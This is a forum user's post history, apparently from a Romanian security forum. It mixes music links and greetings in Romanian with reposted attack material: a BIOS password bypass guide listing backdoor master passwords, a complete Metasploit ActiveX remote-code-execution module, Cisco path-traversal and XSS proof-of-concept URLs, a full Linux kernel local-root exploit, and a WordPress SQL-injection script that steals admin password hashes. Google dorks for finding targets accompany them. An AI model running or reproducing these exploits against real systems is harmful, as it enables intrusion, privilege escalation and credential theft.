Jump to content

Gonzalez

Active Members
  • Posts

    1578
  • Joined

  • Last visited

  • Days Won

    10

Everything posted by Gonzalez

  1. http://www.askvg.com/how-to-reset-remove-bypass-a-bios-or-cmos-password/ BIOS passwords are used to add some extra security to computers. You can either set a password to prevent access to BIOS settings or to prevent PC from booting. But sometimes this extra security might become a pain when you forget the BIOS password or someone changes your system BIOS password intentionally. But there is no need to worry. There are many known ways to reset / remove / bypass the password: By removing CMOS battery By using motherboard jumper By using MS DOS command By using software By using Backdoor BIOS password Now I'll try to explain each method one by one: DISCLAIMER: This information is intended for experienced users. It is not intended for basic users, hackers, or computer thieves. Please do not try any of following procedures if you are not familiar with computer hardware. We'll not be responsible for the use or misuse of this information, including personal injury, loss of data or hardware damage. So use it at your own risk. By Removing CMOS Battery: Almost all motherboards use a small coin sized CMOS battery to store all BIOS settings along with the password. To reset the password, unplug the PC, open the cabinet and remove the CMOS battery for approx. 15-30 minutes and then put it back. It'll reset all BIOS settings as well as the password and you'll need to re-enter all settings. If it fails, then try to remove the battery for at least one hour. By Using Motherboard Jumper: Almost all motherboards contain a jumper that can clear all CMOS settings along with the BIOS password. The location of this jumper varies depending upon the motherboard brand. You should read your motherboard manual to check its location. If you don't have the manual then look for the jumpers near the CMOS battery. Most of the manufacturer label the jumper as CLR, CLEAR, CLEAR CMOS, etc. When you find the jumper, look carefully. There will be 3 pins and the jumper will be joining the center pin to either left or right pin. What you need to do, is remove the jumper and join the center pin to the opposite pin. e.g. if the jumper joins center pin to left pin, then remove it and join center pin to right pin. Now wait for a few seconds and then again remove the jumper and join the center pin to left pin. Make sure to turn the PC off before opening the cabinet and resetting the jumper. By Using MS DOS Command: This method works only if you have access to the system when its turned on because this method requires MS DOS. Open Command Prompt from Programs menu and provide following commands one bye one: debug o 70 2E o 71 FF quit NOTE: The first character in the above commands is English alphabet "o" and not the number 0. After providing the above commands, restart your system and it should reset the CMOS Settings along with the BIOS password. If you are curious to know how it works? then let me explain the above commands: In this method we are using the Debug tool of MS DOS. The "o" character present at first in these commands, outputs the values to IO ports. The number 70 and 71 are port numbers which are used to access CMOS memory. By providing FF value we are telling CMOS that there is an invalid checksum and it resets the CMOS settings as well as BIOS password. By Using Software: There are a few software which can also reset CMOS settings or BIOS password or both within a few clicks. But as stated above you should have access to a system which is turned on and should have access to MS DOS or MS Windows: CmosPwd KillCMOS By Using Backdoor BIOS Password: Some BIOS manufacturer put a backdoor password in BIOS which always works irrespective of what password you have set in BIOS. Its a master password which is used for testing and troubleshooting purposes. AMI BIOS Passwords: A.M.I. AAAMMMIII AMI?SW AMI_SW AMI BIOS CONDO HEWITT RAND LKWPETER MI Oder PASSWORD AWARD BIOS Passwords: 01322222 589589 589721 595595 598598 ALFAROME ALLy aLLy aLLY ALLY aPAf _award award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC PHOENIX BIOS Passwords: BIOS CMOS phoenix PHOENIX Misc Common Passwords: ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj Other Manufacturer BIOS Passwords: Biostar - Biostar Compaq - Compaq Dell - Dell Enox - xo11nE Epox - central Freetech - Posterie IWill - iwill Jetway - spooml Packard Bell - bell9 QDI - QDI Siemens - SKY_FOX TMC - BIGO Toshiba - Toshiba VOBIS & IBM - merlin NOTE: All these passwords are case-sensitive and are changed from time to time by manufacturers.
  2. Bine ca sunt infectate PC-urile americanilor, unde is multi bani. -Gonzalez
  3. Metallica - Die Die My Darling.mp3 -Gonzalez
  4. Ontopic: Am vazut cat de supermani sunteti. Dar voi nici macar atat nu ati facut cat au facut cei doi, si mai vorbiti de iceman ca nu are dinti un gura si ca a aparut pe TV. Voi daca ati fi urati cu cosuri si asa mai departe tot ati fi acceptat invitatia celor de la Pro TV sa fiti pe sticla. Asa ca nu mai comentati fara rost. -Gonzalez
  5. Ce urat e jocul ala ^ -Gonzalez
  6. Ice Cube - It Was A Good Day (HD) -Gonzalez
  7. Parazitii - Super Sclavi.mp3 -Gonzalez
  8. Foarte bun postul. -Gonzalez
  9. Bun venit pe RST. -Gonzalez
  10. Bun venit pe RST. -Gonzalez
  11. Torsten Kanzler - Rock und Roll -Gonzalez
  12. Bun venit pe RST. -Gonzalez
  13. Chris Liebing & Speedy J (Collabs) @ Lehmann Club,Germany (21.04.2012) -Gonzalez
  14. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => "Honeywell HSC Remote Deployer ActiveX Remote Code Execution", 'Description' => %q{ This modules exploits a vulnerability found in the Honewell HSC Remote Deployer ActiveX. This control can be abused by using the LaunchInstaller() function to execute an arbitrary HTA from a remote location. This module has been tested successfully with the HSC Remote Deployer ActiveX installed with HoneyWell EBI R410.1. }, 'License' => MSF_LICENSE, 'Author' => [ 'juan vazquez' ], 'References' => [ [ 'CVE', '2013-0108' ], [ 'OSVDB', '90583' ], [ 'BID', '58134' ], [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi' ], [ 'URL', 'http://ics-cert.us-cert.gov/pdf/ICSA-13-053-02.pdf' ] ], 'Payload' => { 'Space' => 2048, 'StackAdjustment' => -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f -k' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Feb 22 2013", 'DefaultTarget' => 0)) end def exploit @var_exename = rand_text_alpha(5 + rand(5)) + ".exe" @dropped_files = [ @var_exename ] super end def on_new_session(session) if session.type == "meterpreter" session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") end @dropped_files.delete_if do |file| win_file = file.gsub("/", "\\\\") if session.type == "meterpreter" begin wintemp = session.fs.file.expand_path("%TEMP%") win_file = "#{wintemp}\\#{win_file}" session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) session.fs.file.rm(win_file) print_good("Deleted #{file}") true rescue ::Rex::Post::Meterpreter::RequestError print_error("Failed to delete #{win_file}") false end end end end def build_hta(cli) var_shellobj = rand_text_alpha(rand(5)+5); var_fsobj = rand_text_alpha(rand(5)+5); var_fsobj_file = rand_text_alpha(rand(5)+5); var_vbsname = rand_text_alpha(rand(5)+5); var_writedir = rand_text_alpha(rand(5)+5); var_origLoc = rand_text_alpha(rand(5)+5); var_byteArray = rand_text_alpha(rand(5)+5); var_writestream = rand_text_alpha(rand(5)+5); var_strmConv = rand_text_alpha(rand(5)+5); p = regenerate_payload(cli); exe = generate_payload_exe({ :code => p.encoded }) # Doing in this way to bypass the ADODB.Stream restrictions on JS, # even when executing it as an "HTA" application # The encoding code has been stolen from ie_unsafe_scripting.rb print_status("Encoding payload into vbs/javascript/hta..."); # Build the content that will end up in the .vbs file vbs_content = Rex::Text.to_hex(%Q| Dim #{var_origLoc}, s, #{var_byteArray} #{var_origLoc} = SetLocale(1033) |) # Drop the exe payload into an ansi string (ansi ensured via SetLocale above) # for conversion with ADODB.Stream vbs_ary = [] # The output of this loop needs to be as small as possible since it # gets repeated for every byte of the executable, ballooning it by a # factor of about 80k (the current size of the exe template). In its # current form, it's down to about 4MB on the wire exe.each_byte do |b| vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % })\n") end vbs_content << vbs_ary.join("") # Continue with the rest of the vbs file; # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent # Then use ADODB.Stream again to write the binary to file. #print_status("Finishing vbs..."); vbs_content << Rex::Text.to_hex(%Q| Dim #{var_strmConv}, #{var_writedir}, #{var_writestream} #{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{@var_exename}" Set #{var_strmConv} = CreateObject("ADODB.Stream") #{var_strmConv}.Type = 2 #{var_strmConv}.Charset = "x-ansi" #{var_strmConv}.Open #{var_strmConv}.WriteText s, 0 #{var_strmConv}.Position = 0 #{var_strmConv}.Type = 1 #{var_strmConv}.SaveToFile #{var_writedir}, 2 SetLocale(#{var_origLoc})|) hta = <<-EOS <script> var #{var_shellobj} = new ActiveXObject("WScript.Shell"); var #{var_fsobj} = new ActiveXObject("Scripting.FileSystemObject"); var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%"); var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true); #{var_fsobj_file}.Write(unescape("#{vbs_content}")); #{var_fsobj_file}.Close(); #{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true); #{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{@var_exename}", 0, false); #{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs"); window.close(); </script> EOS return hta end def on_request_uri(cli, request) agent = request.headers['User-Agent'] if agent !~ /MSIE \d/ print_error("Browser not supported: #{agent.to_s}") send_not_found(cli) return end uri = ((datastore['SSL']) ? "https://" : "http://") uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']) uri << ":#{datastore['SRVPORT']}" print_status("Request received for #{request.uri}"); if request.uri =~ /\/SystemDisplays\/RemoteInstallWelcome.hta/ hta = build_hta(cli) print_status("Sending HTA application") send_response(cli, hta, {'Content-Type'=>'application/hta'}) return end html = <<-EOS <html> <body> <object id="RemoteInstaller" classid="clsid:0D080D7D-28D2-4F86-BFA1-D582E5CE4867"> </object> <script> RemoteInstaller.LaunchInstaller("#{uri}", "", false); </script> </body> </html> EOS # we need to handle direct /SystemDisplays/RemoteInstallWelcome.hta requests proc = Proc.new do |cli, req| on_request_uri(cli, req) end add_resource({'Path' => "/SystemDisplays/RemoteInstallWelcome.hta", 'Proc' => proc}) rescue nil print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end end
  15. # Exploit Title:Cisco Video Surveillance Operations Manager Multiple vulnerabilities # Google Dork: intitle:"Video Surveillance Operations Manager > Login" # Date: 22 Feb 2013 reported to the vendor # Exploit Author: Bassem | bassem.co # Vendor Homepage: www.cisco.com # Version: Version 6.3.2 # Tested on: Version 6.3.2 #1- The application is vulnerable to Local file inclusion read_log.jsp and read_log.dep not validate the name and location of the log file , un authenticated remote attacker can perform this --------------------------------------------- read_log.jsp: /usr/BWhttpd/root/htdocs/BWT/utils/logs from /usr/BWhttpd/logs/<%= logName %> --------------------------------------------- --------------------------------------------- read_log.dep <%! protected LinkedList getBwhttpdLog( String logName, String theOrder ) { String logPath = "/usr/BWhttpd/logs/"; String theLog = logPath + logName; LinkedList resultList = new LinkedList(); try { BufferedReader in = new BufferedReader(new FileReader(theLog)); String theLine = ""; while( (theLine = in.readLine()) != null ) { if( theOrder.indexOf("descending") > -1 ) { resultList.addFirst(theLine); } else { resultList.addLast(theLine); } } ----------------------------------------------- POC: http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow ##################################################################### #2- The application is vulnerable to local file inclusion select and display log not validate the log file names , If attacker pass /etc/passwd through the http post request system will display it as log file POC: http://serverip/monitor/logselect.php ##################################################################### #3 Cisco Video Surveillance Operations Manager Version 6.3.2 doesn't perform the proper authentication for the management and view console, Remote attacker can gain access to the system and view the attached cameras without authentication POC: http://serverip/broadware.jsp ##################################################################### #4 Application is vulnerable to XSS The web application doesn't perform validation for the inputs/outputs for many of its pages so its vulnerable to XSS attacks POC: http://serverip/vsom/index.php/ "/title><script>alert("ciscoxss");</script> -- Best Regards Bassem
  16. Local root exploit for Fedora 18 x86_64 using nl_table to leverage the sock_diag_handlers[] vulnerability. /* * CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8 * This exploit uses nl_table to jump to a known location */ #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <netinet/tcp.h> #include <errno.h> #include <linux/if.h> #include <linux/filter.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <linux/sock_diag.h> #include <linux/inet_diag.h> #include <linux/unix_diag.h> #include <sys/mman.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; unsigned long sock_diag_handlers, nl_table; int __attribute__((regparm(3))) kernel_code() { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy, sym[512]; int ret = 0; f = fopen("/proc/kallsyms", "r"); if (!f) { return 0; } while (ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym); if (ret == 0) { fscanf(f, "%s\n", sym); continue; } if (!strcmp(name, sym)) { printf("[+] resolved symbol %s to %p\n", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } int main(int argc, char*argv[]) { int fd; unsigned family; struct { struct nlmsghdr nlh; struct unix_diag_req r; } req; char buf[8192]; if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ printf("Can't create sock diag socket\n"); return -1; } memset(&req, 0, sizeof(req)); req.nlh.nlmsg_len = sizeof(req); req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; req.nlh.nlmsg_seq = 123456; req.r.udiag_states = -1; req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; commit_creds = (_commit_creds) get_symbol("commit_creds"); prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); sock_diag_handlers = get_symbol("sock_diag_handlers"); nl_table = get_symbol("nl_table"); if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){ printf("some symbols are not available!\n"); exit(1); } family = (nl_table - sock_diag_handlers) / 8; printf("family=%d\n",family); req.r.sdiag_family = family; if(family>255){ printf("nl_table is too far!\n"); exit(1); } unsigned long mmap_start, mmap_size; mmap_start = 0x100000000; mmap_size = 0x200000; printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size); if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } memset((void*)mmap_start, 0x90, mmap_size); char jump[] = "\x55" // push %ebp "\x48\x89\xe5" // mov %rsp, %rbp "\x48\xc7\xc0\x00\x00\x00\x00" // movabs 0x00, %rax "\xff\xd0" // call *%rax "\x5d" // pop %rbp "\xc3"; // ret unsigned int *asd = (unsigned int*) &jump[7]; *asd = (unsigned int)kernel_code; printf("&kernel_code = %x\n", (unsigned int) kernel_code); memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump)); if ( send(fd, &req, sizeof(req), 0) < 0) { printf("bad send\n"); close(fd); return -1; } printf("uid=%d, euid=%d\n",getuid(), geteuid() ); if(!getuid()) system("/bin/sh"); }
  17. CHRIS LIEBING Live @ CLR London Warehouse Party 24-11-2012 -Gonzalez
  18. Vin adevaratii hackeri la TV. Iceman nici nu stie sa vorbeasca romaneste. -Gonzalez
  19. Metallica - Leper Messiah.mp3 -Gonzalez
  20. Bun venit pe RST. -Gonzalez
  21. Iron Maiden - Out of The Shadows -Gonzalez
  22. http://reviews.cnet.com/2300-6452_7-10016134.html LE: damn, seamana prea tare cu S3 -Gonzalez
  23. #!/usr/bin/ruby # # Exploit Title: WordPress LeagueManager Plugin v3.8 SQL Injection # Google Dork: inurl:"/wp-content/plugins/leaguemanager/" # Date: 13/03/13 # Exploit Author: Joshua Reynolds # Vendor Homepage: http://wordpress.org/extend/plugins/leaguemanager/ (No longer active) # Software Link: http://downloads.wordpress.org/plugin/leaguemanager.3.8.zip (No longer active) # Version: 3.8 # Tested on: BT5R1 - Ubuntu 10.04.2 LTS # CVE: CVE-2013-1852 #----------------------------------------------------------------------------------------- #Description: # #An SQL Injection vulnerability exists in the league_id parameter of a function call made #by the leaguemanager_export page. This request is processed within the leaguemanager.php: # #if ( isset($_POST['leaguemanager_export'])) # $lmLoader->adminPanel->export($_POST['league_id'], $_POST['mode']); # #Which does not sanitize of SQL injection, and is passed to the admin/admin.php page #into the export( $league_id, $mode ) function which also does not sanitize for SQL injection #when making this call: $this->league = $leaguemanager->getLeague($league_id); #The information is then echoed to a CSV file that is then provided. # #Since no authentication is required when making a POST request to this page, #i.e /wp-admin/admin.php?page=leaguemanager-export the request can be made with no established #session. # #Fix: # #A possible fix for this would be to cast the league_id to an integer during any #of the function calls. The following changes can be made in the leaguemanager.php file: #$lmLoader->adminPanel->export((int)$_POST['league_id'], $_POST['mode']); # #These functions should also not be available to public requests, and thus session handling #should also be checked prior to the requests being processed within the admin section. # #The responsible disclosure processes were distorted by the fact that the author no longer #supports his well established plugin, and there are currently no maintainers. After #e-mailing the folks over at plugins@wordpress.org they've decided to discontinue the plugin #and not patch the vulnerability. # #The following ruby exploit will retrieve the administrator username and the salted #password hash from a given site with the plugin installed: #------------------------------------------------------------------------------------------ #Exploit: require 'net/http' require 'uri' if ARGV.length == 2 post_params = { 'league_id' => '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,'\ '9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--', 'mode' => 'teams', 'leaguemanager_export' => 'Download+File' } target_url = ARGV[0] + ARGV[1] + "/wp-admin/admin.php?page=leaguemanager-export" begin resp = Net::HTTP.post_form(URI.parse(target_url), post_params) rescue puts "Invalid URL..." end if resp.nil? print_error "No response received..." elsif resp.code != "200" puts "Page doesn't exist!" else admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/) if(admin_login.length > 0) puts "Username: #{admin_login[0][0]}" puts "Hash: #{admin_login[0][1]}" puts "\nNow go crack that with Hashcat :)" else puts "Username and hash not received. Maybe it's patched?" end end else puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\"" end #Shout outs: Graycon Group Security Team, Red Hat Security Team, Miss Umer, Tim Williams, Dr. Wu, friends & family. # #Contact: #Mail: infosec4breakfast@gmail.com #Blog: infosec4breakfast.com #Twitter: @jershmagersh #Youtube: youtube.com/user/infosec4breakfast
  24. Mie nu-mi place, acum vad poza. Nu ma impresioneaza cu nimic. -Gonzalez
×
×
  • Create New...